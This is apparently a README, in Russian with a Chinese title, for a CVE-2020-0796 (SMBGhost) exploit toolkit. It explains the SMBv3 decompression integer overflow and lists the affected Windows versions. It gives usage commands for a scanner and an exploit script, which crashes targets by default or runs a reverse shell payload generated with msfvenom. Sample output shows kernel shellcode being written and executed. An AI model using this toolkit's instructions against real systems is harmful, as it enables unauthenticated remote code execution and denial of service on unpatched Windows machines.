
cve-2020-0796利用工具集
CVE-2020-0796 вызвана ошибкой в протоколе SMBv3 при обработке вредоносных сжатых пакетов: при распаковке пакета используется длина, переданная клиентом, без проверки её корректности, что в итоге приводит к целочисленному переполнению. Уязвимость позволяет удалённому неаутентифицированному злоумышленнику выполнить произвольный код на целевой системе.
Эта уязвимость схожа с EternalBlue (MS17-010).
Затронутые версии: Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for ARM64-based Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1909 for 32-bit Systems Windows 10 Version 1909 for ARM64-based Systems Windows 10 Version 1909 for x64-based Systems Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation)
scanner.py Сканирование уязвимых хостов на наличие CVE-2020-0796 Формат: python scanner.py ip Пример: python scanner.py 192.168.1.2
exploit.py Атака на уязвимый целевой хост. По умолчанию POC вызывает синий экран. Требуется генерация обратного POC с помощью msfvenom. Формат: python exploit.py -ip ip Пример: python exploit.py -ip 192.168.1.2
Результат: [+] found low stub at phys addr 13000! [+] PML4 at 1ad000 [+] base of HAL heap at fffff79480000000 [+] ntoskrnl entry at fffff80645792010 [+] found PML4 self-ref entry 1eb [+] found HalpInterruptController at fffff79480001478 [+] found HalpApicRequestInterrupt at fffff80645cb3bb0 [+] built shellcode! [+] KUSER_SHARED_DATA PTE at fffff5fbc0000000 [+] KUSER_SHARED_DATA PTE NX bit cleared! [+] Wrote shellcode at fffff78000000a00! [+] Press a key to execute shellcode! [+] overwrote HalpInterruptController pointer, should have execution shortly...